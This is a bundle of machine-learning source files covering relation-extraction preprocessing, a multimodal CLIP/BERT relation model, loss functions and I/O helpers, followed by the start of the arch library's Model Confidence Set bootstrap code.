a += [None]
for i in range(len(a)):
if a[i] is None:
continue
d = d.replace(a[i] + ":", unused[i] + " :")
if x == a[i]:
x = unused[i]
if y == a[i]:
y = unused[i]
return d, x, y
self.D = [[], [], []]
"""
TODO: add new samples. For every sample, if a trigger word is present, mask the trigger and replace the original [MASK] with the correct label token;
if no trigger is present in the sentence, randomly mask a word and replace the original [MASK] with the correct token.
"""
for sid in range(3):
# split into the three dataset splits (train/dev/test)
with open(data_path + "/"+["train.json", "dev.json", "test.json"][sid], "r", encoding="utf8") as f:
data = json.load(f)
sample_idx = 0
for i in range(len(data)):
for j in range(len(data[i][1])):
rid = []
for k in range(36):
if k+1 in data[i][1][j]["rid"]:
rid += [1]
else:
rid += [0]
d, h, t = rename(' '.join(data[i][0]).lower(), data[i][1][j]["x"].lower(), data[i][1][j]["y"].lower())
unused_word = " ".join([f"[unused{i}]" for i in range(3, ptune_k+3)])
# subject markers use [unused3]/[unused4]; object markers use [unused5]/[unused6]
st = [f"[unused{i}]" for i in range(3,5)]
ed = [f"[unused{i}]" for i in range(5,7)]
# [unused7]/[unused8]/[unused9] serve as prompt tokens
prompt = f"[sub] {st[0]} {h} {st[1]} [sub] [unused7] [unused8] [MASK] [unused9] [obj] {ed[0]} {t} {ed[1]} [obj]."
# for temp_i in range(10):
# d = d.replace(f"speaker {temp_i}:", f"[speaker{temp_i}]")
sample_idx += 1
sample = [
prompt + d,
h,
t,
rid,
]
self.D[sid] += [sample]
# multi labels, add more data in the training set
if i == 0:
for idx,trigger in enumerate(data[i][1][j]['t']):
if trigger != "":
label_token = f"[class{data[i][1][j]['rid'][idx]+1}]"
prompt = prompt.replace("[MASK]", label_token)
# first, assume the model predicts the same output at the trigger position
d = d.replace(trigger, "[MASK]", 1)
sample = [
prompt + d,
h,
t,
rid,
]
self.D[sid] += [sample]
logger.info(str(len(self.D[0])) + "," + str(len(self.D[1])) + "," + str(len(self.D[2])))
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[0], "train")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[2], "test")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self.D[1], "dev")
def get_labels(self):
"""See base class."""
return [str(x) for x in range(36)]
def _create_examples(self, data, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for (i, d) in enumerate(data):
guid = "%s-%s" % (set_type, i)
examples.append(InputExample(guid=guid, text_a=data[i][0], text_b=data[i][1], label=data[i][3], text_c=data[i][2]))
return examples
class wiki80Processor(DataProcessor):
"""Processor for the TACRED data set."""
def __init__(self, data_path, use_prompt):
super().__init__()
self.data_dir = data_path
@classmethod
def _read_json(cls, input_file):
data = []
with open(input_file, "r", encoding='utf-8') as reader:
all_lines = reader.readlines()
for line in all_lines:
ins = eval(line)
data.append(ins)
return data
def get_train_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_json(os.path.join(data_dir, "train.txt")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_json(os.path.join(data_dir, "val.txt")), "dev")
def get_test_examples(self, data_dir):
"""See base class."""
return self._create_examples(
self._read_json(os.path.join(data_dir, "test.txt")), "test")
def get_labels(self, negative_label="no_relation"):
data_dir = self.data_dir
"""See base class."""
# if 'k-shot' in self.data_dir:
# data_dir = os.path.abspath(os.path.join(self.data_dir, "../.."))
# else:
# data_dir = self.data_dir
with open(os.path.join(data_dir,'rel2id.json'), "r", encoding='utf-8') as reader:
re2id = json.load(reader)
return re2id
def _create_examples(self, dataset, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for example in dataset:
sentence = example['token']
examples.append(InputExampleWiki80(guid=None,
sentence=sentence,
# possible off-by-one here: the span end index is not decremented by 1
span1=(example['h']['pos'][0], example['h']['pos'][1]),
span2=(example['t']['pos'][0], example['t']['pos'][1]),
ner1=None,
ner2=None,
label=example['relation']))
return examples
def convert_examples_to_features_for_loss(examples, max_seq_length, tokenizer):
print("#examples", len(examples))
features = []
for (ex_index, example) in enumerate(examples):
tokens_a = tokenize(example.text_a, tokenizer)
tokens_b = tokenize(example.text_b, tokenizer)
tokens_c = tokenize(example.text_c, tokenizer)
# t_tokens = tokenize(example.entity, tokenizer)
t_tokens = tokenizer(example.entity, add_special_tokens=False)["input_ids"]
_truncate_seq_tuple(tokens_a, tokens_b, tokens_c, max_seq_length - 4)
tokens_b = tokens_b + ["[SEP]"] + tokens_c
tokens = []
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append("[SEP]")
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
label_id = example.label
len_t = len(t_tokens)
normal_input_ids = input_ids[:]
for idx, input_id in enumerate(input_ids):
if idx + len_t < len(input_ids) and input_ids[idx:idx+len_t] == t_tokens:
# [MASK] id = 103
for j in range(len_t):
input_ids[j+idx] = 103
# append 1 sample with 2 input
features.append(
[InputFeatures(
input_ids=normal_input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
label_id=label_id,
entity = t_tokens
),
InputFeatures(
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
label_id=label_id,
entity = t_tokens
)]
)
print('#features', len(features))
return features
def convert_examples_to_features_normal(examples, max_seq_length, tokenizer):
print("#examples", len(examples))
features = []
for (ex_index, example) in enumerate(examples):
tokens_a = tokenize(example.text_a, tokenizer)
tokens_b = tokenize(example.text_b, tokenizer)
tokens_c = tokenize(example.text_c, tokenizer)
_truncate_seq_tuple(tokens_a, tokens_b, tokens_c, max_seq_length - 4)
tokens_b = tokens_b + ["[SEP]"] + tokens_c
inputs = tokenizer(
example.text_a,
example.text_b + tokenizer.sep_token + example.text_c,
truncation="longest_first",
max_length=max_seq_length,
padding="max_length",
add_special_tokens=True
)
# tokens = []
# segment_ids = []
# tokens.append("[CLS]")
# segment_ids.append(0)
# for token in tokens_a:
# tokens.append(token)
# segment_ids.append(0)
# tokens.append("[SEP]")
# segment_ids.append(0)
# for token in tokens_b:
# tokens.append(token)
# segment_ids.append(1)
# tokens.append("[SEP]")
# segment_ids.append(1)
# input_ids = tokenizer.convert_tokens_to_ids(tokens)
# # The mask has 1 for real tokens and 0 for padding tokens. Only real
# # tokens are attended to.
# input_mask = [1] * len(input_ids)
# # Zero-pad up to the sequence length.
# while len(input_ids) < max_seq_length:
# input_ids.append(0)
# input_mask.append(0)
# segment_ids.append(0)
# assert(inputs['input_ids'] == input_ids), print(inputs['input_ids'])
# assert len(input_ids) == max_seq_length
# assert len(input_mask) == max_seq_length
# assert len(segment_ids) == max_seq_length
label_id = example.label
if ex_index == 0:
logger.info(f"input_text : {tokens_a} {tokens_b} {tokens_c}")
logger.info(f"input_ids : {inputs['input_ids']}")
logger.info(f"token_type_ids : {inputs['token_type_ids']}")
# inputs = {}
# inputs['input_ids'] = input_ids
# inputs['attention_mask'] = input_mask
# inputs['token_type_ids'] = segment_ids
# append 1 sample with 2 input
features.append(
InputFeatures(
input_ids=inputs['input_ids'],
input_mask=inputs['attention_mask'],
segment_ids=inputs['token_type_ids'],
label_id=label_id,
)
)
print('#features', len(features))
return features
def convert_examples_to_features(examples, max_seq_length, tokenizer, args, rel2id):
"""Loads a data file into a list of `InputBatch`s."""
save_file = "data/cached_wiki80.pkl"
mode = "text"
num_tokens = 0
num_fit_examples = 0
num_shown_examples = 0
instances = []
use_bert = "BertTokenizer" in tokenizer.__class__.__name__
use_gpt = "GPT" in tokenizer.__class__.__name__
assert not (use_bert and use_gpt), "model cannot be gpt and bert together"
if False:
with open(file=save_file, mode='rb') as fr:
instances = pickle.load(fr)
print('load preprocessed data from {}.'.format(save_file))
else:
print('loading..')
for (ex_index, example) in enumerate(examples):
"""
the relation between SUBJECT and OBJECT is .
"""
if ex_index % 10000 == 0:
logger.info("Writing example %d of %d" % (ex_index, len(examples)))
tokens = []
SUBJECT_START = "[subject_start]"
SUBJECT_END = "[subject_end]"
OBJECT_START = "[object_start]"
OBJECT_END = "[object_end]"
if mode.startswith("text"):
for i, token in enumerate(example.sentence):
if i == example.span1[0]:
tokens.append(SUBJECT_START)
if i == example.span2[0]:
tokens.append(OBJECT_START)
# for sub_token in tokenizer.tokenize(token):
# tokens.append(sub_token)
if i == example.span1[1]:
tokens.append(SUBJECT_END)
if i == example.span2[1]:
tokens.append(OBJECT_END)
tokens.append(token)
SUBJECT = " ".join(example.sentence[example.span1[0]: example.span1[1]])
OBJECT = " ".join(example.sentence[example.span2[0]: example.span2[1]])
SUBJECT_ids = tokenizer(" "+SUBJECT, add_special_tokens=False)['input_ids']
OBJECT_ids = tokenizer(" "+OBJECT, add_special_tokens=False)['input_ids']
if use_gpt:
if args.CT_CL:
prompt = f"[T1] [T2] [T3] [sub] {OBJECT} [sub] [T4] [obj] {SUBJECT} [obj] [T5] {tokenizer.cls_token}"
else:
prompt = f"The relation between [sub] {SUBJECT} [sub] and [obj] {OBJECT} [obj] is {tokenizer.cls_token} ."
else:
# add prompt [T_n] and entity marker [obj] to enrich the context.
prompt = f"[sub] {SUBJECT} [sub] {tokenizer.mask_token} [obj] {OBJECT} [obj] ."
if ex_index == 0:
input_text = " ".join(tokens)
logger.info(f"input text : {input_text}")
logger.info(f"prompt : {prompt}")
logger.info(f"label : {example.label}")
inputs = tokenizer(
prompt,
" ".join(tokens),
truncation="longest_first",
max_length=max_seq_length,
padding="max_length",
add_special_tokens=True
)
if use_gpt: cls_token_location = inputs['input_ids'].index(tokenizer.cls_token_id)
# find the subject and object tokens, choose the first ones
sub_st = sub_ed = obj_st = obj_ed = -1
for i in range(len(inputs['input_ids'])):
if sub_st == -1 and inputs['input_ids'][i:i+len(SUBJECT_ids)] == SUBJECT_ids:
sub_st = i
sub_ed = i + len(SUBJECT_ids)
if obj_st == -1 and inputs['input_ids'][i:i+len(OBJECT_ids)] == OBJECT_ids:
obj_st = i
obj_ed = i + len(OBJECT_ids)
assert sub_st != -1 and obj_st != -1
num_tokens += sum(inputs['attention_mask'])
if sum(inputs['attention_mask']) > max_seq_length:
pass
# tokens = tokens[:max_seq_length]
else:
num_fit_examples += 1
x = OrderedDict()
x['input_ids'] = inputs['input_ids']
if use_bert: x['token_type_ids'] = inputs['token_type_ids']
x['attention_mask'] = inputs['attention_mask']
x['label'] = rel2id[example.label]
if use_gpt: x['cls_token_location'] = cls_token_location
x['so'] =[sub_st, sub_ed, obj_st, obj_ed]
instances.append(x)
with open(file=save_file, mode='wb') as fw:
pickle.dump(instances, fw)
print('Finish save preprocessed data to {}.'.format( save_file))
input_ids = [o['input_ids'] for o in instances]
attention_mask = [o['attention_mask'] for o in instances]
if use_bert: token_type_ids = [o['token_type_ids'] for o in instances]
if use_gpt: cls_idx = [o['cls_token_location'] for o in instances]
labels = [o['label'] for o in instances]
so = torch.tensor([o['so'] for o in instances])
input_ids = torch.tensor(input_ids)
attention_mask = torch.tensor(attention_mask)
if use_gpt: cls_idx = torch.tensor(cls_idx)
if use_bert: token_type_ids = torch.tensor(token_type_ids)
labels = torch.tensor(labels)
logger.info("Average #tokens: %.2f" % (num_tokens * 1.0 / len(examples)))
logger.info("%d (%.2f %%) examples can fit max_seq_length = %d" % (num_fit_examples,
num_fit_examples * 100.0 / len(examples), max_seq_length))
if use_gpt:
dataset = TensorDataset(input_ids, attention_mask, cls_idx, labels)
elif use_bert:
dataset = TensorDataset(input_ids, attention_mask, token_type_ids, labels, so)
else:
dataset = TensorDataset(input_ids, attention_mask, labels)
return dataset
def convert_examples_to_feature_sst2(examples, max_seq_length, tokenizer, args, rel2id):
"""Loads a data file into a list of `InputBatch`s."""
save_file = "data/cached_wiki80.pkl"
mode = "text"
num_tokens = 0
num_fit_examples = 0
num_shown_examples = 0
instances = []
if False:
with open(file=save_file, mode='rb') as fr:
instances = pickle.load(fr)
print('load preprocessed data from {}.'.format(save_file))
else:
print('loading..')
for (ex_index, example) in enumerate(examples):
try:
prompt = f"[T1] [T2] {tokenizer.mask_token} ."
inputs = tokenizer(
example.text_a + prompt,
truncation="longest_first",
max_length=max_seq_length,
padding="max_length",
add_special_tokens=True
)
x = OrderedDict()
x['input_ids'] = inputs['input_ids']
x['attention_mask'] = inputs['attention_mask']
if "roberta" not in args.model_name_or_path:
x['token_type_ids'] = inputs['token_type_ids']
x['label'] = int(example.label)
instances.append(x)
except Exception as e:
print(e)
with open(file=save_file, mode='wb') as fw:
pickle.dump(instances, fw)
print('Finish save preprocessed data to {}.'.format( save_file))
input_ids = [o['input_ids'] for o in instances]
attention_mask = [o['attention_mask'] for o in instances]
if "roberta" not in args.model_name_or_path:
token_type_ids = [o['token_type_ids'] for o in instances]
token_type_ids = torch.tensor(token_type_ids)
labels = [o['label'] for o in instances]
input_ids = torch.tensor(input_ids)
attention_mask = torch.tensor(attention_mask)
labels = torch.tensor(labels)
logger.info("Average #tokens: %.2f" % (num_tokens * 1.0 / len(examples)))
logger.info("%d (%.2f %%) examples can fit max_seq_length = %d" % (num_fit_examples,
num_fit_examples * 100.0 / len(examples), max_seq_length))
if "roberta" not in args.model_name_or_path:
dataset = TensorDataset(input_ids, attention_mask, token_type_ids, labels)
else:
dataset = TensorDataset(input_ids, attention_mask, labels)
return dataset
def _truncate_seq_tuple(tokens_a, tokens_b, tokens_c, max_length):
"""Truncates a sequence tuple in place to the maximum length."""
# This is a simple heuristic which will always truncate the longer sequence
# one token at a time. This makes more sense than truncating an equal percent
# of tokens from each, since if one sequence is very short then each token
# that's truncated likely contains more information than a longer sequence.
while True:
total_length = len(tokens_a) + len(tokens_b) + len(tokens_c)
if total_length <= max_length:
break
if len(tokens_a) >= len(tokens_b) and len(tokens_a) >= len(tokens_c):
tokens_a.pop()
elif len(tokens_b) >= len(tokens_a) and len(tokens_b) >= len(tokens_c):
tokens_b.pop()
else:
tokens_c.pop()
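# Worked example: with max_length=6 and token lists of lengths (4, 3, 2), the
# longest list is popped one token at a time, giving final lengths (2, 2, 2).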
def get_dataset(mode, args, tokenizer, processor):
if mode == "train":
examples = processor.get_train_examples(args.data_dir)
elif mode == "dev":
examples = processor.get_dev_examples(args.data_dir)
elif mode == "test":
examples = processor.get_test_examples(args.data_dir)
else:
raise Exception("mode must be in choice [trian, dev, test]")
gpt_mode = "wiki80" in args.task_name
if "wiki80" in args.task_name:
# normal relation extraction task
dataset = convert_examples_to_features(
examples, args.max_seq_length, tokenizer, args, processor.get_labels()
)
return dataset
elif "sst" in args.task_name:
dataset = convert_examples_to_feature_sst2(
examples, args.max_seq_length, tokenizer, args, None
)
return dataset
else:
train_features = convert_examples_to_features_normal(
examples, args.max_seq_length, tokenizer
)
input_ids = []
input_mask = []
segment_ids = []
label_id = []
entity_id = []
for f in train_features:
input_ids.append(f.input_ids)
input_mask.append(f.input_mask)
segment_ids.append(f.segment_ids)
label_id.append(f.label_id)
all_input_ids = torch.tensor(input_ids, dtype=torch.long)
all_input_mask = torch.tensor(input_mask, dtype=torch.long)
all_segment_ids = torch.tensor(segment_ids, dtype=torch.long)
all_label_ids = torch.tensor(label_id, dtype=torch.float)
train_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_label_ids)
return train_data
def collate_fn(batch):
pass
processors = {"normal": bertProcessor, "reloss": relossProcessor , "ptune": ptuneProcessor, "wiki80": wiki80Processor,
"sst-2": Sst2Processor
}
```
#### File: multimodal/models/IFA_model.py
```python
import torch
from torch import nn
import torch.nn.functional as F
from .modeling_IFA import IFAModel
from .clip.modeling_clip import CLIPModel
from .clip.configuration_clip import CLIPConfig
from transformers import BertConfig, BertModel
class IFAREModel(nn.Module):
def __init__(self, num_labels, tokenizer, args):
super(IFAREModel, self).__init__()
self.args = args
self.vision_config = CLIPConfig.from_pretrained(self.args.vit_name).vision_config
self.text_config = BertConfig.from_pretrained(self.args.bert_name)
clip_model_dict = CLIPModel.from_pretrained(self.args.vit_name).vision_model.state_dict()
bert_model_dict = BertModel.from_pretrained(self.args.bert_name).state_dict()
print(self.vision_config)
print(self.text_config)
# for re
self.vision_config.device = args.device
self.model = IFAModel(self.vision_config, self.text_config)
# load:
vision_names, text_names = [], []
model_dict = self.model.state_dict()
for name in model_dict:
if 'vision' in name:
clip_name = name.replace('vision_', '').replace('model.', '')
if clip_name in clip_model_dict:
vision_names.append(clip_name)
model_dict[name] = clip_model_dict[clip_name]
elif 'text' in name:
text_name = name.replace('text_', '').replace('model.', '')
if text_name in bert_model_dict:
text_names.append(text_name)
model_dict[name] = bert_model_dict[text_name]
assert len(vision_names) == len(clip_model_dict) and len(text_names) == len(bert_model_dict), \
(len(vision_names), len(text_names), len(clip_model_dict), len(bert_model_dict))
self.model.load_state_dict(model_dict)
self.model.resize_token_embeddings(len(tokenizer))
self.dropout = nn.Dropout(0.5)
self.classifier = nn.Linear(self.text_config.hidden_size*2, num_labels)
self.head_start = tokenizer.convert_tokens_to_ids("<s>")
self.tail_start = tokenizer.convert_tokens_to_ids("<o>")
self.tokenizer = tokenizer
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
labels=None,
images=None,
aux_imgs=None,
rcnn_imgs=None,
):
bsz = input_ids.size(0)
output = self.model(input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
pixel_values=images,
aux_values=aux_imgs,
rcnn_values=rcnn_imgs,
return_dict=True,)
last_hidden_state, pooler_output = output.last_hidden_state, output.pooler_output
bsz, seq_len, hidden_size = last_hidden_state.shape
entity_hidden_state = torch.Tensor(bsz, 2*hidden_size) # batch, 2*hidden
for i in range(bsz):
head_idx = input_ids[i].eq(self.head_start).nonzero().item()
tail_idx = input_ids[i].eq(self.tail_start).nonzero().item()
head_hidden = last_hidden_state[i, head_idx, :].squeeze()
tail_hidden = last_hidden_state[i, tail_idx, :].squeeze()
entity_hidden_state[i] = torch.cat([head_hidden, tail_hidden], dim=-1)
entity_hidden_state = entity_hidden_state.to(self.args.device)
logits = self.classifier(entity_hidden_state)
if labels is not None:
loss_fn = nn.CrossEntropyLoss()
return loss_fn(logits, labels.view(-1)), logits
return logits
```
#### File: multimodal/modules/metrics.py
```python
def eval_result(true_labels, pred_result, rel2id, logger, use_name=False):
correct = 0
total = len(true_labels)
correct_positive = 0
pred_positive = 0
gold_positive = 0
neg = -1
for name in ['NA', 'na', 'no_relation', 'Other', 'Others', 'none', 'None']:
if name in rel2id:
if use_name:
neg = name
else:
neg = rel2id[name]
break
for i in range(total):
golden = true_labels[i]
if golden == pred_result[i]:
correct += 1
if golden != neg:
correct_positive += 1
if golden != neg:
gold_positive += 1
if pred_result[i] != neg:
pred_positive += 1
acc = float(correct) / float(total)
try:
micro_p = float(correct_positive) / float(pred_positive)
except:
micro_p = 0
try:
micro_r = float(correct_positive) / float(gold_positive)
except:
micro_r = 0
try:
micro_f1 = 2 * micro_p * micro_r / (micro_p + micro_r)
except:
micro_f1 = 0
result = {'acc': acc, 'micro_p': micro_p, 'micro_r': micro_r, 'micro_f1': micro_f1}
logger.info('Evaluation result: {}.'.format(result))
return result
```
#### File: standard/tools/loss.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
class LabelSmoothSoftmaxCEV1(nn.Module):
def __init__(self, lb_smooth=0.1, reduction='mean', ignore_index=-100):
super(LabelSmoothSoftmaxCEV1, self).__init__()
self.lb_smooth = lb_smooth
self.reduction = reduction
self.lb_ignore = ignore_index
self.log_softmax = nn.LogSoftmax(dim=1)
def forward(self, logits, label):
logits = logits.float() # use fp32 to avoid nan
with torch.no_grad():
num_classes = logits.size(1)
label = label.clone().detach()
ignore = label.eq(self.lb_ignore)
n_valid = ignore.eq(0).sum()
label[ignore] = 0
lb_pos, lb_neg = 1. - self.lb_smooth, self.lb_smooth / num_classes
lb_one_hot = torch.empty_like(logits).fill_(
lb_neg).scatter_(1, label.unsqueeze(1), lb_pos).detach()
logs = self.log_softmax(logits)
loss = -torch.sum(logs * lb_one_hot, dim=1)
loss[ignore] = 0
if self.reduction == 'mean':
loss = loss.sum() / n_valid
if self.reduction == 'sum':
loss = loss.sum()
return loss
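# Usage sketch (hypothetical shapes): logits (N, C) and integer labels (N,):
#   criterion = LabelSmoothSoftmaxCEV1(lb_smooth=0.1)
#   loss = criterion(torch.randn(8, 5), torch.randint(0, 5, (8,)))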
def taylor_softmax_v1(x, dim=1, n=4, use_log=False):
assert n % 2 == 0 and n > 0
fn = torch.ones_like(x)
denor = 1.
for i in range(1, n + 1):
denor *= i
fn = fn + x.pow(i) / denor
out = fn / fn.sum(dim=dim, keepdims=True)
if use_log: out = out.log()
return out
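# Note: this replaces exp(x) in the softmax with its order-n Taylor expansion
# 1 + x + x^2/2! + ... + x^n/n!, then normalizes over `dim`.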
class LogTaylorSoftmaxV1(nn.Module):
def __init__(self, dim=1, n=2):
super(LogTaylorSoftmaxV1, self).__init__()
assert n % 2 == 0
self.dim = dim
self.n = n
def forward(self, x):
return taylor_softmax_v1(x, self.dim, self.n, use_log=True)
class TaylorCrossEntropyLossV1(nn.Module):
def __init__(self, n=2, ignore_index=-1, reduction='mean'):
super(TaylorCrossEntropyLossV1, self).__init__()
assert n % 2 == 0
self.taylor_softmax = LogTaylorSoftmaxV1(dim=1, n=n)
self.reduction = reduction
self.ignore_index = ignore_index
def forward(self, logits, labels):
log_probs = self.taylor_softmax(logits)
loss = F.nll_loss(log_probs, labels, reduction=self.reduction,
ignore_index=self.ignore_index)
return loss
class FocalLoss(nn.Module):
def __init__(self, gamma=0, alpha=None, size_average=True):
super(FocalLoss, self).__init__()
self.gamma = gamma
self.alpha = alpha
if isinstance(alpha,(float,int)):
self.alpha = torch.Tensor([alpha,1-alpha])
if isinstance(alpha,list):
self.alpha = torch.Tensor(alpha)
self.size_average = size_average
def forward(self, input, target):
if input.dim()>2:
input = input.view(input.size(0),input.size(1),-1) # N,C,H,W => N,C,H*W
input = input.transpose(1,2) # N,C,H*W => N,H*W,C
input = input.contiguous().view(-1,input.size(2)) # N,H*W,C => N*H*W,C
target = target.view(-1,1)
logpt = F.log_softmax(input,dim=1)
logpt = logpt.gather(1,target)
logpt = logpt.view(-1)
pt = Variable(logpt.data.exp())
if self.alpha is not None:
if self.alpha.type()!=input.data.type():
self.alpha = self.alpha.type_as(input.data)
at = self.alpha.gather(0,target.data.view(-1))
logpt = logpt * Variable(at)
loss = -1 * (1-pt)**self.gamma * logpt
if self.size_average:
return loss.mean()
else:
return loss.sum()
```
#### File: standard/utils/ioUtils.py
```python
import os
import csv
import json
import pickle
import logging
from typing import NewType, List, Tuple, Dict, Any
__all__ = [
'load_pkl',
'save_pkl',
'load_csv',
'save_csv',
'load_jsonld',
'save_jsonld',
'jsonld2csv',
'csv2jsonld',
]
logger = logging.getLogger(__name__)
Path = str
def load_pkl(fp: Path, verbose: bool = True) -> Any:
"""
Load data from a pickle file.
Args :
fp (String) : path to load the data from
verbose (bool) : whether to log the operation
Return :
data (Any) : the loaded data
"""
if verbose:
logger.info(f'load data from {fp}')
with open(fp, 'rb') as f:
data = pickle.load(f)
return data
def save_pkl(data: Any, fp: Path, verbose: bool = True) -> None:
"""
Save data to a pickle file.
Args :
data (Any) : data to save
fp (String) : path to save to
verbose (bool) : whether to log the operation
"""
if verbose:
logger.info(f'save data in {fp}')
with open(fp, 'wb') as f:
pickle.dump(data, f)
def load_csv(fp: Path, is_tsv: bool = False, verbose: bool = True) -> List:
"""
Load a csv file.
Args :
fp (String) : path of the file
is_tsv (bool) : whether the file uses the excel-tab dialect
verbose (bool) : whether to log the operation
Return :
list(reader) (List): the loaded rows as a List
"""
if verbose:
logger.info(f'load csv from {fp}')
dialect = 'excel-tab' if is_tsv else 'excel'
with open(fp, encoding='utf-8') as f:
reader = csv.DictReader(f, dialect=dialect)
return list(reader)
def save_csv(data: List[Dict], fp: Path, save_in_tsv: bool = False, write_head=True, verbose=True) -> None:
"""
Save data to a csv file.
Args :
data (List) : the List data to save
fp (String) : path to save to
save_in_tsv (bool) : whether to save using the excel-tab dialect
write_head (bool) : whether to write the header row
verbose (bool) : whether to log the operation
"""
"""
if verbose:
logger.info(f'save csv file in: {fp}')
with open(fp, 'w', encoding='utf-8') as f:
fieldnames = data[0].keys()
dialect = 'excel-tab' if save_in_tsv else 'excel'
writer = csv.DictWriter(f, fieldnames=fieldnames, dialect=dialect)
if write_head:
writer.writeheader()
writer.writerows(data)
def load_jsonld(fp: Path, verbose: bool = True) -> List:
"""
Load a jsonld file.
Args:
fp (String): path of the jsonld file
verbose (bool): whether to log the operation
Return:
datas (List) : the loaded data as a List
"""
if verbose:
logger.info(f'load jsonld from {fp}')
datas = []
with open(fp, encoding='utf-8') as f:
for l in f:
line = json.loads(l)
data = list(line.values())
datas.append(data)
return datas
def save_jsonld(fp):
"""
Save data to a jsonld file (not implemented).
"""
pass
def jsonld2csv(fp: str, verbose: bool = True) -> str:
"""
Read a jsonld file and save it as a csv file with the same name in the same location.
Args:
fp (String): path of the jsonld file
verbose (bool): whether to log the operation
Return:
fp_new (String): path of the new file
"""
data = []
root, ext = os.path.splitext(fp)
fp_new = root + '.csv'
if verbose:
print(f'read jsonld file in: {fp}')
with open(fp, encoding='utf-8') as f:
for l in f:
line = json.loads(l)
data.append(line)
if verbose:
print('saving...')
with open(fp_new, 'w', encoding='utf-8') as f:
fieldnames = data[0].keys()
writer = csv.DictWriter(f, fieldnames=fieldnames, dialect='excel')
writer.writeheader()
writer.writerows(data)
if verbose:
print(f'saved csv file in: {fp_new}')
return fp_new
def csv2jsonld(fp: str, verbose: bool = True) -> str:
"""
Read a csv file and save it as a jsonld file with the same name in the same location.
Args:
fp (String): path of the csv file
verbose (bool): whether to log the operation
Return:
fp_new (String): path of the new file
"""
data = []
root, ext = os.path.splitext(fp)
fp_new = root + '.jsonld'
if verbose:
print(f'read csv file in: {fp}')
with open(fp, encoding='utf-8') as f:
reader = csv.DictReader(f, fieldnames=None, dialect='excel')
for line in reader:
data.append(line)
if verbose:
print('saving...')
with open(fp_new, 'w', encoding='utf-8') as f:
f.write(os.linesep.join([json.dumps(l, ensure_ascii=False) for l in data]))
if verbose:
print(f'saved jsonld file in: {fp_new}')
return fp_new
``` |
{
"source": "johncollinsai/post-high-frequency-data",
"score": 3
} |
#### File: arch/bootstrap/multiple_comparison.py
```python
from __future__ import annotations
import copy
from typing import Dict, Hashable, List, Optional, Sequence, Tuple, Union, cast
import numpy as np
import pandas as pd
from arch.bootstrap.base import (
CircularBlockBootstrap,
MovingBlockBootstrap,
StationaryBootstrap,
)
from arch.typing import (
ArrayLike,
BoolArray,
Float64Array,
IntArray,
Literal,
Uint32Array,
)
from arch.utility.array import DocStringInheritor, ensure2d
__all__ = ["StepM", "SPA", "RealityCheck", "MCS"]
def _info_to_str(
model: str, info: Dict[str, str], is_repr: bool = False, is_html: bool = False
) -> str:
if is_html:
model = "<strong>" + model + "</strong>"
_str = model + "("
for k, v in info.items():
if k.lower() != "id" or is_repr:
if is_html:
k = "<strong>" + k + "</strong>"
_str += k + ": " + v + ", "
return _str[:-2] + ")"
class MultipleComparison(object):
"""
Abstract class for inheritance
"""
def __init__(self) -> None:
self._model = ""
self._info: Dict[str, str] = {}
self.bootstrap: CircularBlockBootstrap = CircularBlockBootstrap(
10, np.ones(100)
)
def __str__(self) -> str:
return _info_to_str(self._model, self._info, False)
def __repr__(self) -> str:
return _info_to_str(self._model, self._info, True)
def _repr_html_(self) -> str:
return _info_to_str(self._model, self._info, True, True)
def reset(self) -> None:
"""
Reset the bootstrap to its initial state.
"""
self.bootstrap.reset()
def seed(self, value: Union[int, List[int], Uint32Array]) -> None:
"""
Seed the bootstrap's random number generator
Parameters
----------
value : {int, List[int], ndarray[int]}
Integer to use as the seed
"""
self.bootstrap.seed(value)
class MCS(MultipleComparison):
"""
Model Confidence Set (MCS) of Hansen, Lunde and Nason.
Parameters
----------
losses : {ndarray, DataFrame}
T by k array containing losses from a set of models
size : float, optional
Value in (0,1) to use as the test size when implementing the
MCS. Default value is 0.05.
block_size : int, optional
Length of window to use in the bootstrap. If not provided, sqrt(T)
is used. In general, this should be provided and chosen to be
appropriate for the data.
method : {'max', 'R'}, optional
MCS test and elimination implementation method, either 'max' or 'R'.
Default is 'R'.
reps : int, optional
Number of bootstrap replications to use. Default is 1000.
bootstrap : str, optional
Bootstrap to use. Options are
'stationary' or 'sb': Stationary bootstrap (Default)
'circular' or 'cbb': Circular block bootstrap
'moving block' or 'mbb': Moving block bootstrap
seed : {int, Generator, RandomState}, optional
Seed value to use when creating the bootstrap used in the comparison.
If an integer or None, the NumPy default_rng is used with the seed
value. If a Generator or a RandomState, the argument is used.
Notes
-----
See [1]_ for details.
References
----------
.. [1] <NAME>., <NAME>., & <NAME>. (2011). The model confidence set.
Econometrica, 79(2), 453-497.
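Examples
--------
A minimal usage sketch (synthetic losses for illustration only):
>>> import numpy as np
>>> losses = np.random.standard_normal((250, 10))
>>> mcs = MCS(losses, size=0.05, reps=500)
>>> mcs.compute()
>>> included = mcs.included   # column indices kept in the confidence set
>>> pvals = mcs.pvalues       # per-model MCS p-values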
"""
def __init__(
self,
losses: ArrayLike,
size: float,
reps: int = 1000,
block_size: Optional[int] = None,
method: Literal["R", "max"] = "R",
bootstrap: Literal[
"stationary", "sb", "circular", "cbb", "moving block", "mbb"
] = "stationary",
*,
